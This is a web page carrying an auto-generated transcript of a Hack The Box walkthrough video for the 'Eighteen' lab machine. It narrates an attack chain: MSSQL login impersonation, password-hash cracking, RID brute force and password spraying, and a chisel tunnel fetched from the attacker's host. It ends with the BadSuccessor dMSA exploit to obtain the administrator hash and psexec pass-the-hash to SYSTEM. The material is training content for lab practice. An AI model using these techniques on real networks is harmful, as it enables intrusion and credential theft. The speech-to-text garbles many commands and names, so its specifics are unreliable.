HackThebox - Eighteen

IppSec · Beginner ·🔧 Backend Engineering ·2mo ago

Key Takeaways

Demonstrates hacking techniques, including nmap, NetExec, and MSSQL Priv module, to exploit vulnerabilities in a Flask application

Full Transcript

What's going on YouTube? This is IPSC and today we'll be doing 18 from Hack the Box which starts off as an assumed breach scenario where we get credentials to Microsoft SQL. Once we log in, we discover we can impersonate another user that gives us access to read the users table of the web app where we can dump and crack a password. However, we don't know what user that password goes to. So, we'll perform a RID brute force to generate a username list. Then, net exec to spray the password. Once on the box, we discovered it's running Windows 2025, and Googling around shows it may be vulnerable to bad successor, which is an exploit I didn't know much about how it worked before solving the box. However, after solving it, I have a much better understanding. And while this is mostly patched, it still provides a pretty nice attack service for other post exploitation activities. So, with that being said, let's just jump in. As always, we're going to start off with an end map. So, - SC for default scripts, SV enumerate versions, VV for double verbose. This gives us things like the TTL 08 output all formats by the end mapap directory and call it 18 and then the IP address of 1012918.41. This can take some time to run. So I've already ran it. Looking at the results, we have just two ports open. The first one being HTTP on port 80. And its banner tells us it's a Microsoft IIS server. It's also giving us a redirect to 18. HTTP. So let's go ahead and add this to our host file. So we'll do pseudo vty host and then we can add 10 10 11 oh nope 10129 1841 18.htb There we go. And then the next port we have is Microsoft SQL on 1433. It is running server 2022. And it doesn't look like we get much more information. We do have self-signed certificates. So we don't even get a host name there. But we do have this host name. And let's just do a curl-v I think dash forget what gives me just a head. Um I can just do 18.httdb. Let's do less. I just want to look at the headers. And did I get them back? Maybe the less was a bad idea. Um let's just do curl. We get the page. This should give me the headers. I just want to kind of look at um everything. We still see IIS. Nothing really interesting. That's pretty much what end mapap had told us. So let's go ahead and take a look at the server. This is a assumed breach box. So we could also just go straight and look at like Microsoft SQL server because we do have a set of credentials. But I always always always like starting with um web. So looking at this, we have a page, we have a get started. Uh we can create an account. So I'm just going to do ipsack ipsack root atipsseack.ros. We'll do a password of password login. So let's just do ipsack password. And we can enter some information expenses. Um what else do we have? There's an admin. Uh we can't access the admin. We could try to see what type of server this is. Um this may be a flask error message. Let's go to OXDF 404 pages. And we could test Flask a few ways. Um I'll show another one. Even if this does um come back with something. Where is Flask? So Flask likes starting with this um where was it? Did I pass it? Uh this dock type HTML. So let's look at this source. This is definitely going to be a Flask 404 page. It matches identically. But let's say they had custom 404s. Um, we could look at the cookie because it did let us log in. So, we definitely have a cookie. And this, if we look at it, let's just do echo-N. This to me looks like a Flask cookie. And when I say it looks like a Flask cookie, um, it's like a JWT with a lot of information and the middle part is the small part. And then we got this. This just screams flask to me. Um, if it was a regular JWT, I'd imagine uh the first piece would be much smaller than the middle piece. So, we could use a tool like Flask um unsign. So, we do flask unsign uh I think dash d for decode, then c for cookie. We can get all the information here. Um on a box, I actually had trouble decoding this because I think a while like old old versions of Flask just put this in B 64. If we try to decode it, um it says invalid input. It's probably going to be a padding issue because it does URL um B 64, but that's just going to get rid of the error message. We don't see this data here. So, what happened? Um, this is actually uh z-libded. So, if I do I'm going to say pigs, which is going to be like a command line thing to do a z-lib inflate. Um, I'll do z for z-lib, d for de um decompress, and c for standard out, I want to say. I'm going to put it like this. And then I'm going to go with this way to execute a command. And we get the same thing as flask sign. Right? So we just did a uh deflate on I think actually I think inflate on this. Um but it was z-lib compressed. So that's what that like why we don't see the output because flask does compress it. So that's how we can look at cookies. Um but really we don't really get that much information. Uh, we could try like flask unsign and brute forcing the signing key and maybe turning yourself to an admin, but at this point I'd rather just start looking at the SQL server. So, it did give us creds. So, I'm going to do nxc mssql and then um I'm just going to do 18.htb because I don't remember the IP address. Kevin, and then we want to give it the password. So, I'm going to go ahead and grab this, paste it in, and we could also try logging in with Kevin on the website itself, right? Um, this is saying login has failed. We came from an untrusted domain. Try local off. So, let's do what the error message tells us to do. And let's see, we get a valid login. So, Net Exec has a lot of scripts we could just run from here. Um, I think dash capital L is going to give us modules. There is a RID brute which we'll do in a little bit. But I like the um MSSQL priv module. So if we had just ran this and we'll see exactly what output it gives us, we see Kevin can impersonate appdev. So this is just hinting at we have impersonation on the database. So let's just go ahead and now switch to um impact Microsoft SQL client. So we get a shell or like a console on this SQL server. So we can say Kevin then we got to put the password back in and then at um 18.htb put this in quotes because we do have a special character here. But now we have impacts um Microsoft uh MSSQL shell. Now you could do the same exact thing here. We could say like an DB that shows us all the databases. We could say like an users an was it impersonate and we can see the same exact thing. Kevin can impersonate appdev. Um, if we go back to this DB, if we say um, what is it like show tables financial planner? That's not it. Is it like SP? Oh, let's see. Select star from CIS tables. Oh, man. Um, is it like table name? It's been so long as I do Microsoft SQL stuff. Um, let's see. Table history. That didn't get me. Name. Maybe I want to do name. N name. That's not getting me exactly what I expected. I was hoping to be able to get um information from this financial planner table but maybe we don't have access to it. So let's see an dboom links login user start job. Uh one thing we could also do let's do pseudo responder-ash i ton zero and then xp dur tree to our IP. So 10 10 158 and we do get a Microsoft SQL Service um NLM V2 hash. We could try cracking this. It doesn't crack to anything, so I'm not going to waste your time. But these are just things I would um play with, right? If this did end with a dollar sign, that would mean it's like a machine account or group managed service account, a special account that has a randomly generated password. So I wouldn't try cracking it if it ended with a dollar sign, but in this case, I probably would. But I'm being lazy right now and not showing you. Let's see. Let's just try um I'm not running like enable XP cmd shell because it says guest, but we could do this, right? Uh we don't have permission. We can try XP cmd shell. Who am I? Nothing. So, let's just do execute. Well, let me do a new impersonate again so I can see the results. So we can do execute as login. So we'll do execute as login is equal to appdev. And this is going to be how we abuse this impersonation. So now we can see we went from Kevin to appdev. And now we have appdev at master. So now let's go ahead and do an db. We can see pretty much the same thing. Um, let's go with enable XP cmd shell. Same thing. Um, nothing's really working. If we do select start, uh, we did name from cis.ts. Same thing there. Um, let's see. MSSQL cheat sheet. I want to look at this table and I'm struggling. Here we go. This what I normally refer to. Select version, current user, list, user, password, hashes, select name. These are still things. Select I'm an idiot. Sometimes I have to use financial planner and then now this select name from says tables is going to work. Wow. Uh I'm going to do select star from users and let's see we have admin admin 18.htb and we have this password hash. So let's go ahead and try to crack this hash. So let's kill that. I'm gonna go sh Kraken, which is a box on my local network. Gonna go into the hashcat directory vashes 18 dot um pbkdf2 shaw 256. Paste this hash in. And if we try running this, it's not going to recognize the format. We have to do a little bit of manipulation here. So, let's do opt word list rocku uh text. Let's see. Come on. Initialize the bridge and tell me it's not going to work. That's fine. There we go. Nothing matched. So, I'm going to run uh example hashes, right? And then let's go pbkdf2. So, that's going to be Shaw 2v6 AES. Let's see what do we have. Um, this is Shaw 5 Hmax Shaw 512. Wonder if we should just um Grep because there is a lot of this. So, let's just do Gp PBKDF and see if we have anything that looks good. Um, this one stands out. PBKDF2 Shaw 256. Uh, let's go ahead and run example hashes and see exactly what this is. So, let's go less again. Search that. Go up. And it says it is Django, which is a little bit odd. We know this is Flask, not Django, but I mean, and the format kind of matches. So, let's just go ahead and try to match this. So, I'm going to go, let's go ls, not that. V hashes 18. Paste that in. And let's see, this is a underscore. Then we put a dollar for the separator. And this is going to be the iteration count. I'm guessing this is salt. And then this is data. And now the thing that stands out to me is the data in the example is base 64. This looks like it's hex. So I'm going to guess that is an issue. But let's go ahead and test it real quick. So if we just run this. Whoops. Um, not that. Where is it? There we go. We'll run it again. Um, make sure that still errors. Yep. Does it match? So, let's go ahead and convert this hex over to base 64. So, if we do echo- n xxdr-p, um, I'm going to give it another xxd. That did not do it. Um, how do we convert this hex? Is it just - RP? Oh, wait. That didn't work. There we go. So, it helps if I paste it the first time. But here we go. We have now converted this into hex. We can see here's the hex format. If I don't do the XXD, it just looks like junk, right? Um, so let's go with best 6, not best 64. B 64 is what I want to do. And I'm just going to put a echo at the end so we can cleanly copy this. And then V hashes 18. And we want to go where that zero is. Delete word. Paste. And let's try running it again. And hopefully it detects it. If not, we're making a weird mistake. But here we go. It's initializing the back end. Um, looks like everything is going. It detected it as Django. And let's see. Do we get a hit pretty quickly? See how long it says it's going to take. has not recovered yet. And there we go. It has now successfully cracked. So, let's just do a d-show. And we can see the password is I love you one. So, what does this password go to? Um, we could now, I guess, log into this web app. So, if I go over into the app, log out. Uh, let's go log in. Type in admin. I love you one. We should now be the admin. We can go to admin features and we could play with this. Um, it doesn't look like there's any like input here. Like we could spend a lot of time looking for an API, but there's no API here. This is pretty much a dead end. Um, well, it's not pretty much. It is a dead end, right? So, let's get out of um hashcat and we can get out of this shell. I'm going to go back into my Microsoft um SQL stuff. If we do the -h, there was this RID brute. So, let's brute force our IDs from the Microsoft SQL Server. And we get a bunch of users. So, let's go ahead and um copy these out. Uh v users.ext. Let's paste this. And then we can say a uh cat users a print. That looks like the six field. Awesome. And now let's move t to users.ext. And if we look at users now, we just have a list of usernames. I don't know if the domain is going to mess anything up or not, but we will find out. So let's do net exec. You uh users.ext and then the password was um I love you one. I want to say I hope I got that right. Um run it again. Uh we can't log in because um we're untrusted domain. We could again try uh was it local user? What was it? Local off. See if we get anywhere here. Nothing works. And that kind of makes sense because these are not local accounts. They're domain accounts. And one thing that is somewhat annoying on the default top 10,00 ports of NMAP um what is it 59 85 and six I want to say is not on it and that's going to be winrm. Um we have to do HTTP. So we can see these ports are open or 5985 is at least which is winrm. So, let's go ahead and change this over to WinRM protocol. And we get Adam Scott. So, let's go ahead and try evil winrm- Adam Scott-P. Um, I should be able to do 18.htb. I think I can do a DNS there. Did I typo it? I'm going to put the password in a quote. Let's see. Ping. Okay. Evo Winr RM. Let's see. Dash iip. Don't know exactly what's going on there, but let's go ahead get the IP. I'm going to use that. Weird. I'm not exactly sure what's going on here. Uh, let's do pseudo Wireshark- I tonsier. I don't do um ton adapters with wireshark. Just run Wireshark. Let's see. This font, this font is small. Can I make this big? Hopefully, we're not in here long. Okay, awesome. So, we make this post. I'm just wondering if we get to like a host name where it's trying to reach and that's why it failed. Doesn't look like it. Maybe we have to specify a domain. So, let's exit this. I'm going to do dashd 18.htb. How do we do domain? Is it going to be like realm? Yeah. Do I have the password wrong or something? NXC. Let's just copy this. Oh, I have an exclamation point. That's probably it. Can get rid of this. There we go. Well, um, out of habit, I just always added a bang after the number one, I guess, in a password. But now we get on the box. We can do a diir here. Nothing in documents. DIR. I did 2DS. Let's go into desktop. We get user.ext. So now I'd probably go and start digging into like the web server itself because um well if I do who am I/priv we can see I don't have like semerson but if we were able to um get onto the web server if this like PHP we drop a PHP script we could shell the web server and then potentially this account has a se impersonate privilege where we can use like god potato or something like that to priv This is Flask, so we can't really do that. If I do get ACL app.py, um, it doesn't look like we'd be able to write to this. We can just test it out real quick. Um, hopefully I don't crash the web server. Yeah, we can't write here. Um, we could go and like pull this file down and try to find a remote code execution vulnerability, but let's just look at the libraries it imports real quick. Um, we do have an OS. So if we do OS urandom OS dot, it's only using OS for urandom. Like it's not doing OS system or anything like that. So I don't know if there's going to be a quick um web priv here. Could pull it down, look at sneak, see what else it says. But one thing I always like doing nowadays is looking at the Windows version. So we do get item property and then HQ local machine software Microsoft Windows NT current version. Uh this is just generally how I do it. Um we can see the version here. This is going to be 26100 4349. Um this is Windows Server 2025 data center. But if I go ahead, let's just close this out real quick. We don't need to save that. and go to Google. Um here site is it support microsoft.com. Uh we can see this is the June 10th 2025 build um because this minor version matches. So this has been last updated in June um 2025. If it was before this then I would try decoders um what is it? Is it like remove mic partial impact or I think it's impact. It's either Impact and NLM relay. One of the things, um, look at my Dark Zero video where we just covered this, but I would try this if the DC was missing this patch. Um, and I guess I don't know it's a DC yet, but um, let's do Whoops, not that stat. Is it an Windows? Lots of ports. Oh my god, that was a mistake. TCP we have 389. So LDAP um there should be 3306 as well. Not 3306. Um 636. Yeah, there we go. That's going to be an LDAP port. 389's LDAP. So this is definitely most likely a DC. But one key thing is it's Windows Server 2025. Um, I know if I Google Active Directory exploit 2025, this gets to bad successor. Um, let's go. I wonder if I just Googled Windows Exploit. Windows Exploit 2025 server. Does this still um DMSA? So, this is going to be bad successor as well. Um, looking at it, it's like this is the first box we've done with Windows Server 2025. Did someone just install this because they wanted to? um showcase the latest version of Windows or is there a specific exploit and in this case it is going to be the bad successor exploit and we'll talk about this for a little bit. Um it is a relatively interesting exploit. I don't fully understand it like this box is what kind of taught me it. Um essentially the DMSA is going to be a delegated managed service account and it's very similar to like a group managed service account. Remember when I was talking about cracking like Microsoft SQL servers? If it was a um GMSA account, you'd see it look like this in Active Directory um to indicate it's a special account. Um main thing being the dollar sign at the end. But the DMSA is something that's new. It's so people can help getting migrated over to um a better version of accounts. And one thing the DMSA does is it has this process. Um, it's talking about the migration, but there we go. Manage account preceded by link. So, it allows us a way to impersonate another account essentially. So, we create this special u managed service account. We point it at the account it's supposed to replace and then this managed service account magically can impersonate that account and have all the same privileges. That is essentially what this exploit is doing. Um now the downside or what happens before this patch I for exactly what it is. Um one of these group me uh memberships that uh do we see it quickly? Uh let's see. Yeah, we can write who the preceded account is in active directory. So when we do that we can just say we can impersonate anyone we want. Um the key thing being we'll have to um have right access to an OU. I believe we could test that with like bloody ad blood hound and things like that. Um right here is the unexpected and whenever you see pack that is the privilege um attribute um certificate but in here we're just saying um we can now impersonate users essentially. It's relatively hard to explain, but essentially DMSA um we create an account. We say our account can impersonate any user we want because we have right access to a special attribute of that account. And then when we create a ticket, it will give us that impersonation privilege. Um what was fixed is the right permission to that um link or maybe it wasn't the right maybe you have to have right permission over the account that you're impersonating. um they changed something. And also um Akame or Ame, however you pronounce it, does have a good article. Uh successor Akame or Ame. Um I would also read this because it's still an attack vector. Um it's not that high because you need write access to something else, but it's um a good way to do like an alternative DC sync or alternative shadow credential, right? Because if we have generic write over the object then we can just tell that object hey this account um is the DMSA to us and when our DMSA and the target account matches that allows us to impersonate. So this is another way we can still um impersonate another account in active directory. I don't see many people using it for this. they still use like shadow credentials and things like that that depend on ADCS, but this is another pretty cool thing for Windows Server 2025. So, um we'll probably still see this attack path um become more popular as more people update to 2025 and set the domain functional force level to 2025. A lot of places will have the latest version of Windows, but they never do the step where they update the um Active Directory functional force level. So, they wouldn't have the uh DMSA functionality because they never updated Active Directory. I still see places with Active Directory like on 2019, 2016, like super old um levels just because there's not much um reason to update AD because most people don't take advantage of the latest AD things. But that's enough ranting. Let's go ahead and exploit this. Now, we could use tools like Sharp Successor and Ruby to do it all on this box, but I really hate runningNet things and just running Windows executables. So, what I'm going to do is I'm going to set up a tunnel back to me. And we're going to use net exec to exploit this. So, let's go ahead and go here. Let's do make dur dubdubdub. I'm going to go in here. Let's copy op chisel. uh chisel uh we want.exe Python 3 m http server and let's do a curl and my IP address. So http 10 10 105 158 8000 chisel.exe and we'll write it to chisel.exe. While that goes let's stamp the server. So up chisel chisel and then server we'll do on port 801. And then we want to allow reverse and socks. Is it socks 5? There we go. And then now let's execute chisel.exe client 10 10 15 80001 our sucks. Uh let's see. Okay. Um I saw this error message. I thought it wasn't connecting, but I also see um it open. So awesome. So now if we do proxy chains and see 127001 445, can we talk to it? Uh let's do ZV. Yes, we can. Um it is open. So, let's go ahead and edit Etsy host. And I'm going to point this now to local host. So, let's do 127001. And I'm going to run um proxy chains again. So, let's do nxc um SMB-U. Is it Adam Scott password? I love you one and I want to say it's LDAP actually SMB list modules and then let's just search up there is a bad successor module so let's do dash capital M bad successor and it needs options no options required Um, LDAP target. Oh, 18. HTTP. I never specified where LDAP was going. Um, that was weird. I'm actually surprised that like it still somewhat worked. Um, session is working. Okay, so we do see it looks like it is going to be vulnerable. we can write over this um itou and if we do options on this there's going to be nothing now what I want to do is go to not impact um net exec github whenever there's something I want to do in net exec that I think should be in net exec um I always go to their github I go to issues and then I search for it and like nine times out of 10 um it's in there and I just can't find it and like the help um because I'm bad at searching for things. But other times you see it's supposed to be in there or it's going to be in there soon. It's just not yet. And here we have a PR that's going to enable it. We can see um let's see. They give it the bad successor and then the target OU and it does everything for us. So let's go ahead and install um this fork. So if we go here, I have net exec installed with UV. So I'm just going to do UV tool install. And then we just need to add the branch, which is feet, and this. So we go and add this. And now when I run the options, hopefully it will list what options are available. So we can do dash O and the target OU. So, let's go ahead and look at this again because it gives us the OU. And let's see. Can I copy this quickly? I can. Awesome. It is thinking of running. My proxy still up. Yes, it is. There we go. So, let's go with O target OU. And I'm not sure if I give it or not. Let's just give it staff. Let's try this. Um, I have two dashers. Let's see. This may fail. If it fails, uh, that's not the failure I expected. Um, let's see. Pseudo NTP date. Uh, we have to proxy chains 18. Oh, this is may not work. No eligible. Um, let's see. We have a shell in the box, right? We do. Evil winrm. Where's the username? Oh, it's Adam Scott. Um, I love you one. That's right. evil winrm- I 18 htb Adam Scott password I love you one we could also potentially get the um time out of the header I think we have to do two one like that because standard error is the header goes in standard error is what I'm trying to Okay. Um, is it 10 129 1841? There we go. So, we could get the header this way or the time. It is 413 GMT. I wonder if we can just do a date with that pseudo date. Let's see. I am EDT which is 4 hours minus. So maybe 913. Is it D S? Okay, we set the date. Run this again. Let's see. -4 - 4 1 let's see. There we go. You can include time zone 12. I not sure what I'm thinking. Still a time. Wait, what? Crawl grab date print two. Let's go ahead and grab that. Oh, I don't have to. So I can do pseudo date- s. I don't think that's right. Oops. Let's just try this clock skew. At some point, I probably should just manually convert the time because automating this is proven to be a bit of a pain. I know I've done this before. Um, let's see. It did not like it cut like the year off or No, that's right. I don't know what it's doing there. Let's grab date. I do. Is it I for header? Let's get rid of the standard error. That looks better. We can pipe errors to devnull. Now, okay, let's do said date space. Okay, we have this date. Now, so pseudo date- s please set the time right. We have to put that in quotes. That looks better. And we're still going to get clockw error. Watch. Come on. Please work. It's taking us time. We should definitely have the date set unless maybe this just does not like there we go. So that is a good command to um set the date on your computer based upon a web server. But finally we have it we have DNS host name of this is which is what we created with the uh attack and then this account has administrator as the target. So this account can now impersonate the administrator and it gives us the NLM hash. So now if I do um pseudo ps exec um is it dash hashes administrator at 127001. Um, we don't need pseudo. We just want proxy chains. There we go. We do who am I? We're anti- athorious system. So, we can go users administrator desktop and get root.ext. So, hope you guys enjoyed that. Take care and I will see you all next time.

Original Description

00:00 - Introduction 00:45 - Start of nmap 02:20 - Taking a look at the page, manually decoding the Flask Cookie 06:15 - Running NetExec with MSSQL Priv module which lets us know we can impersonate, switching to mssqlclient 09:30 - Impersonating appdev, which can read the financial_planner table 12:25 - Converting the PBKDF2 hash to the Django format so we can try to crack it 16:20 - Using NXC to run RID BRUTE through MSSQL and get other users to spray the password with 20:50 - Using Evil-WinRM to access the box as Adam.Scott then poke at the webserver files, nothing here 22:45 - Getting the Windows Patch Level, noticing windows 2025 and searching exploits to find BadSuccessor 30:00 - Setting up Chisel so we can tunnel back to our box to run the badsuccessor module with nxc 32:50 - Looking at NXC Issues to see the support for BadSuccessor is still a PR, installing the special branch with uv 39:15 - Setting our system time to the time on the webserver based upon the Date Header from Curl 40:15 - Running BadSuccessor getting the NTLM hash of administrator and using psexec to get on the box
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from IppSec · IppSec · 0 of 60

← Previous Next →
1 HHC2016 - Analytics
HHC2016 - Analytics
IppSec
2 HackTheBox - October
HackTheBox - October
IppSec
3 HackTheBox - Arctic
HackTheBox - Arctic
IppSec
4 HackTheBox - Brainfuck
HackTheBox - Brainfuck
IppSec
5 HackTheBox - Bank
HackTheBox - Bank
IppSec
6 HackTheBox - Joker
HackTheBox - Joker
IppSec
7 HackTheBox - Lazy
HackTheBox - Lazy
IppSec
8 Camp CTF 2015 - Bitterman
Camp CTF 2015 - Bitterman
IppSec
9 HackTheBox - Devel
HackTheBox - Devel
IppSec
10 Reversing Malicious Office Document (Macro) Emotet(?)
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
11 HackTheBox - Granny and Grandpa
HackTheBox - Granny and Grandpa
IppSec
12 HackTheBox - Pivoting Update: Granny and Grandpa
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
13 HackTheBox - Optimum
HackTheBox - Optimum
IppSec
14 HackTheBox - Charon
HackTheBox - Charon
IppSec
15 HackTheBox - Sneaky
HackTheBox - Sneaky
IppSec
16 HackTheBox - Holiday
HackTheBox - Holiday
IppSec
17 HackTheBox - Europa
HackTheBox - Europa
IppSec
18 Introduction to tmux
Introduction to tmux
IppSec
19 HackTheBox - Blocky
HackTheBox - Blocky
IppSec
20 HackTheBox - Nineveh
HackTheBox - Nineveh
IppSec
21 HackTheBox - Jail
HackTheBox - Jail
IppSec
22 HackTheBox - Blue
HackTheBox - Blue
IppSec
23 HackTheBox - Calamity
HackTheBox - Calamity
IppSec
24 HackTheBox - Shrek
HackTheBox - Shrek
IppSec
25 HackTheBox - Mirai
HackTheBox - Mirai
IppSec
26 HackTheBox - Shocker
HackTheBox - Shocker
IppSec
27 HackTheBox - Mantis
HackTheBox - Mantis
IppSec
28 HackTheBox - Node
HackTheBox - Node
IppSec
29 HackTheBox - Kotarak
HackTheBox - Kotarak
IppSec
30 HackTheBox - Enterprise
HackTheBox - Enterprise
IppSec
31 HackTheBox - Sense
HackTheBox - Sense
IppSec
32 HackTheBox - Minion
HackTheBox - Minion
IppSec
33 VulnHub - Sokar
VulnHub - Sokar
IppSec
34 VulnHub - Pinkys Palace v2
VulnHub - Pinkys Palace v2
IppSec
35 HackTheBox - Inception
HackTheBox - Inception
IppSec
36 Vulnhub - Trollcave 1.2
Vulnhub - Trollcave 1.2
IppSec
37 HackTheBox - Ariekei
HackTheBox - Ariekei
IppSec
38 HackTheBox - Flux Capacitor
HackTheBox - Flux Capacitor
IppSec
39 HackTheBox - Jeeves
HackTheBox - Jeeves
IppSec
40 HackTheBox - Tally
HackTheBox - Tally
IppSec
41 HackTheBox - CrimeStoppers
HackTheBox - CrimeStoppers
IppSec
42 HackTheBox - Fulcrum
HackTheBox - Fulcrum
IppSec
43 HackTheBox - Chatterbox
HackTheBox - Chatterbox
IppSec
44 HackTheBox - Falafel
HackTheBox - Falafel
IppSec
45 How To Create Empire Modules
How To Create Empire Modules
IppSec
46 HackTheBox - Nightmare
HackTheBox - Nightmare
IppSec
47 HackTheBox - Nightmarev2  - Speed Run/Unintended Solutions
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
48 HackTheBox - Bart
HackTheBox - Bart
IppSec
49 HackTheBox -  Aragog
HackTheBox - Aragog
IppSec
50 HackTheBox - Valentine
HackTheBox - Valentine
IppSec
51 HackTheBox - Silo
HackTheBox - Silo
IppSec
52 HackTheBox - Rabbit
HackTheBox - Rabbit
IppSec
53 HackTheBox - Celestial
HackTheBox - Celestial
IppSec
54 HackTheBox - Stratosphere
HackTheBox - Stratosphere
IppSec
55 HackTheBox - Poison
HackTheBox - Poison
IppSec
56 HackTheBox - Canape
HackTheBox - Canape
IppSec
57 HackTheBox - Olympus
HackTheBox - Olympus
IppSec
58 HackTheBox - Sunday
HackTheBox - Sunday
IppSec
59 HackTheBox - Fighter
HackTheBox - Fighter
IppSec
60 HackTheBox - Bounty
HackTheBox - Bounty
IppSec

Related Reads

📰
I built a native Android app in an afternoon, and I've never written a line of Kotlin
Learn how to build a native Android app without prior Kotlin knowledge, leveraging modern tools and frameworks to streamline development
Dev.to · Tilde A. Thurium
📰
Vibe Coding Is Real Now — Here’s How to Do It Without Wrecking Your Codebase
Learn how to apply vibe coding effectively to speed up feature development without compromising code quality, and why discipline is key to its success
Medium · Programming
📰
How to build your first MCP server in 10 minutes
Learn to build a Minecraft server using MCP in under 10 minutes for a seamless gaming experience
Dev.to · GrahamduesCN
📰
Revisiting My Software Engineering Journey
Learn how browsers communicate with servers using HTTP and HTTPS protocols, essential for software engineers to build scalable web applications
Medium · JavaScript

Chapters (13)

Introduction
0:45 Start of nmap
2:20 Taking a look at the page, manually decoding the Flask Cookie
6:15 Running NetExec with MSSQL Priv module which lets us know we can impersonate,
9:30 Impersonating appdev, which can read the financial_planner table
12:25 Converting the PBKDF2 hash to the Django format so we can try to crack it
16:20 Using NXC to run RID BRUTE through MSSQL and get other users to spray the pass
20:50 Using Evil-WinRM to access the box as Adam.Scott then poke at the webserver fi
22:45 Getting the Windows Patch Level, noticing windows 2025 and searching exploits
30:00 Setting up Chisel so we can tunnel back to our box to run the badsuccessor mod
32:50 Looking at NXC Issues to see the support for BadSuccessor is still a PR, insta
39:15 Setting our system time to the time on the webserver based upon the Date Heade
40:15 Running BadSuccessor getting the NTLM hash of administrator and using psexec t
Up next
Indian Express Editorial Analysis by Chandan Sharma - 1 JULY 2026 | UPSC Current Affairs 2026
StudyIQ IAS
Watch →